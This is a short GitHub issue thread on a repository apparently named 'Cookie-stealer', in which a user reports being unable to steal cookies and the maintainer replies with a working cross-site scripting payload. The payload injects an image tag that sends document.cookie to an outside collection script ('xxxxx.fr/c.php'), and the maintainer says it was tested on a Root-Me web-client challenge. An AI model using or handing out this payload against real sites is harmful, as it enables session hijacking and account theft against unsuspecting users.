### ISSUE TITLE
Cookies : No data

### ISSUE THREAD

**Issue by pwnxpl0it** [Xyl2k/Cookie-stealer#3]
i can't steal any Cookies

**Comment by Xyl2k** [comment]
it work just fine, you probably have an error with your payload, or maybe the site you try it on is not vulnerable at all.
try something like
`<script>document.write("<img src='http://xxxxx.fr/c.php?c="+document.cookie+"'></img>");</script>`

i just tested on [challenge01.root-me.org/web-client/ch18/](http://challenge01.root-me.org/web-client/ch18/) and so far, no problem.
![2020-11-15_20-26-38](https://user-images.githubusercontent.com/8536299/99194653-0f8b8b80-2781-11eb-9415-d4a6efc5920e.png)
